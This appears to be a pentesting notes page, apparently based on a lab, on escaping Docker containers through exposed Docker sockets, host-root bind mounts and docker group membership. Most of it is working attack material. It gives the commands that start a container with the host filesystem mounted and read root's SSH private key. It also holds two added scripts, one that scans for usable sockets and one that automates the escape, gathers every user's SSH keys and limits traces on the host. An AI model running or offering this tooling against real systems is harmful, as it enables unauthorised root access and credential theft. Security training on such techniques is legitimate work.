
Pentesting docker

See docker.

https://www.panoptica.app/research/7-ways-to-escape-a-container

Docker Shared Directories

When using Docker, shared directories (volume mounts) can bridge the gap between the host system and the container's filesystem. Shared directories can be mounted as read-only or read-write, depending on specific administrator requirements.

Enumerate additional (non-standard) directories on the container's filesystem; a bind-mounted host directory also shows up as a separate entry in the container's mount table, which makes it easy to spot:

ls -la ~ 

Note, for instance, whether you have access to a .ssh folder: a key found there may belong to a host user rather than to the container.

Docker sockets

The Docker socket (Docker daemon socket) is a Unix-domain socket file through which users and processes talk to the Docker daemon. The Docker CLI is only a client: every command we type is sent over the socket to the daemon, which carries out the requested action. Because the daemon runs as root, anyone who can connect to the socket effectively has root on the host.

The daemon can also be exposed over a network interface (TCP) so that Docker hosts can be managed remotely. That is convenient for distributed setups but widens the attack surface. Inside a container, the more common finding is a socket that has been bind-mounted into an application directory so that automated tasks (deployment scripts, CI jobs) can control Docker. Those mounts, and the scripts that use them, are exactly what we look for, because they give us a way out of the container:

ls -al ~/app

Output:

total 8
drwxr-xr-x 1 htb-student htb-student 4096 Jun 30 15:12 .
drwxr-xr-x 1 root        root        4096 Jun 30 15:12 ..
srw-rw---- 1 root        root           0 Jun 30 15:27 docker.soc

From here on, we can use the docker binary to interact with the socket and enumerate which containers are already running. The -H option points the client at this socket's path instead of the default /var/run/docker.sock; the docker client has to be present inside the container (or be uploaded to it).

docker -H unix:///app/docker.sock ps
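Before trying the docker client, it helps to know whether the socket is connectable at all. Connecting to a Unix-domain socket requires write permission on the socket file, so that is the bit to check. The following is an added example, not code from the original page: a POSIX shell function that classifies a socket from its ls -l line for a given user, applying the normal owner/group/other order, plus a scan that runs it over the live system. The function names, the search paths and the sample listings used to test it are my own assumptions.

```sh
#!/bin/sh
# Added example (not from the page): decide whether a socket file listed by
# `ls -l` is connectable for a given user. Connecting to a Unix-domain socket
# requires write permission on the socket file, so only the w bits matter.
# Assumes the usual ls -l field order (mode, links, owner, group, ...).

# classify_socket_line "<ls -l line>" USER "GROUP1 GROUP2 ..."
# Prints one of: not-a-socket, usable, denied.
# Unix DAC order: root bypasses; otherwise owner bits if we own the file,
# else group bits if we are in its group, else the other bits.
classify_socket_line() {
    line=$1 me=$2 my_groups=$3
    set -- $line
    mode=$1 owner=$3 group=$4
    case $mode in
        s*) ;;
        *) echo not-a-socket; return 0 ;;
    esac
    # Positions 3, 6 and 9 of the mode string are the owner/group/other w bits.
    # A trailing '+' (ACL present) does not move them, but getfacl may then
    # reveal extra grants that this simple check cannot see.
    owner_w=$(printf '%s' "$mode" | cut -c3)
    group_w=$(printf '%s' "$mode" | cut -c6)
    other_w=$(printf '%s' "$mode" | cut -c9)
    if [ "$me" = root ]; then
        echo usable; return 0
    fi
    if [ "$owner" = "$me" ]; then
        [ "$owner_w" = w ] && echo usable || echo denied
        return 0
    fi
    for g in $my_groups; do
        if [ "$g" = "$group" ]; then
            [ "$group_w" = w ] && echo usable || echo denied
            return 0
        fi
    done
    [ "$other_w" = w ] && echo usable || echo denied
}

# Scan the live system for Docker sockets (default path first, then anything
# that looks like one) and classify each for the current user.
# Output lines: "<verdict>\t<ls -l line>".
docker_socket_scan() {
    me=$(id -un); my_groups=$(id -Gn)
    {
        ls -l /var/run/docker.sock 2>/dev/null
        find / \( -name '*docker*' -o -name '*.sock' \) -type s 2>/dev/null \
            | while read -r s; do ls -l "$s"; done
    } | sort -u | while read -r l; do
        printf '%s\t%s\n' "$(classify_socket_line "$l" "$me" "$my_groups")" "$l"
    done
}
```

Run docker_socket_scan from inside the container; every line marked usable is a socket you can hand to docker -H unix://<path>. A denied verdict means the client will fail with permission denied unless an ACL or a capability grants more than the mode bits show.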

Abusing mapping to root directory

We can create our own container that bind-mounts the host's root directory (/) to /hostsystem inside the new container, which gives us full read and write access to the host's filesystem. We reuse the main_app image because it is already present on the host, so nothing has to be pulled. The bind mount alone is what provides the filesystem access; --privileged additionally hands the container all capabilities and the host's devices, which is useful later but not required for this step.

docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app

# And check running processes:
docker -H unix:///app/docker.sock ps

Output:

CONTAINER ID     IMAGE         COMMAND                 CREATED           STATUS           PORTS     NAMES
7ae3bcc818af     main_app      "/docker-entry.s..."    12 seconds ago    Up 8 seconds     443/tcp   app
3fe8a4782311     main_app      "/docker-entry.s..."    3 days ago        Up 17 minutes    443/tcp   app
<SNIP>

Now we can open a shell in the new privileged container with the ID 7ae3bcc818af and browse /hostsystem. (docker run -d also prints the ID of the container it just started, so the ps listing is only needed to confirm it is still up.)

docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash

Output:

root@7ae3bcc818af:~# cat /hostsystem/root/.ssh/id_rsa

-----BEGIN RSA PRIVATE KEY-----
<SNIP>

From there, we can read the root user's private SSH key, or that of any other user who keeps one under their home directory, and use it to log in to the host over SSH. Keys protected by a passphrase are of less immediate use. Note also that the mount is read-write, so we are not limited to reading the host's files.
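The whole procedure above (confirm the socket answers, pick an image that is already on the host, start a container with the host root bind-mounted, collect SSH keys from the mount) as one script. This is an added example, not code from the original page: the function names, the /hostsystem mount point, the choice to leave out --privileged and the key states it reports are my assumptions. It generalises the page's single cat of /root/.ssh/id_rsa to every user's .ssh directory and tells PEM keys that need a passphrase apart from cleartext ones.

```sh
#!/bin/sh
# Added example (not from the page). Usage:
#   sh escape.sh escape /app/docker.sock    # from inside the compromised container
#   sh escape.sh harvest /hostsystem        # what the script runs in the new container
# Assumptions: docker CLI available, host root mounted at /hostsystem
# (hypothetical path), images listed by `docker image ls`.

# Parse `docker image ls` output (stdin) and print the first image with a real
# tag as REPO:TAG, so no network access is needed to pull one. Skips the
# header line and dangling <none> layers.
first_local_image() {
    awk 'NR > 1 && $2 != "<none>" { print $1 ":" $2; exit }'
}

# Report private keys under ROOT/root/.ssh and ROOT/home/*/.ssh as
# "<state>\t<path>". States: pem-cleartext, pem-encrypted (needs passphrase),
# openssh (passphrase flag is inside the blob; check with
# `ssh-keygen -y -P '' -f KEY`), unknown. Public keys are skipped.
harvest_ssh_keys() {
    root=$1
    for d in "$root"/root/.ssh "$root"/home/*/.ssh; do
        [ -d "$d" ] || continue
        for k in "$d"/id_*; do
            [ -f "$k" ] || continue
            case $k in *.pub) continue ;; esac
            if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$k" 2>/dev/null; then
                state=openssh
            elif grep -Eq 'Proc-Type: 4,ENCRYPTED|BEGIN ENCRYPTED PRIVATE KEY' "$k" 2>/dev/null; then
                state=pem-encrypted
            elif grep -q 'PRIVATE KEY-----' "$k" 2>/dev/null; then
                state=pem-cleartext
            else
                state=unknown
            fi
            printf '%s\t%s\n' "$state" "$k"
        done
    done
}

# SOCK: path of the Docker socket. Starts a container with the host's /
# mounted at /hostsystem and runs the harvest step inside it.
escape_via_socket() {
    sock=$1
    docker -H "unix://$sock" info >/dev/null 2>&1 \
        || { echo "no daemon answering on $sock" >&2; return 1; }
    img=$(docker -H "unix://$sock" image ls | first_local_image)
    [ -n "$img" ] || { echo "no tagged local image available" >&2; return 1; }
    # `run -d` prints the new container ID, so there is no need to grep `docker ps`.
    # --privileged is not needed for filesystem access; the bind mount is enough.
    cid=$(docker -H "unix://$sock" run --rm -d -v /:/hostsystem \
          --entrypoint sh "$img" -c 'while :; do sleep 60; done') || return 1
    echo "host root mounted in container $cid ($img)" >&2
    # Feed this same script to a shell inside the new container ($0 is our path),
    # so nothing has to be copied in.
    docker -H "unix://$sock" exec -i "$cid" sh -s harvest /hostsystem < "$0"
    echo "interactive shell: docker -H unix://$sock exec -it $cid sh" >&2
}

case ${1:-} in
    escape)  escape_via_socket "$2" ;;
    harvest) harvest_ssh_keys "$2" ;;
esac
```

The --entrypoint override keeps the container alive regardless of what the image's own entrypoint does, and the container is removed (--rm) as soon as it is stopped, which limits the traces left on the host.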

Abuse writable docker socket

Another case is a Docker socket that our user can write to. It is usually located at /var/run/docker.sock, but the location can differ. Connecting to a Unix-domain socket requires write permission on the socket file, and by default only root and members of the docker group have it. If we are in neither but the socket is nevertheless writable for us (world-writable, or writable through some other group we belong to), we can escalate our privileges just the same, here by starting an Ubuntu container with the host's root mounted and chrooting into it. The ubuntu image must already be present on the host or be pullable from there:

docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash

# Inside the chroot we are root on the host's filesystem:
ls -la

Docker Group

In the simplest case, the user we are logged in with is a member of the docker group. Members of that group may talk to the daemon, which is equivalent to root on the host:

id

Output:

uid=1000(docker-user) gid=1000(docker-user) groups=1000(docker-user),116(docker)

Alternatively, the docker binary may have the SUID bit set, or our user may have a sudoers entry that permits running docker as root.

To see which images exist and which we can access, we can use the following command:

docker image ls
Last update: 2025-02-16
Created: November 9, 2023 18:17:11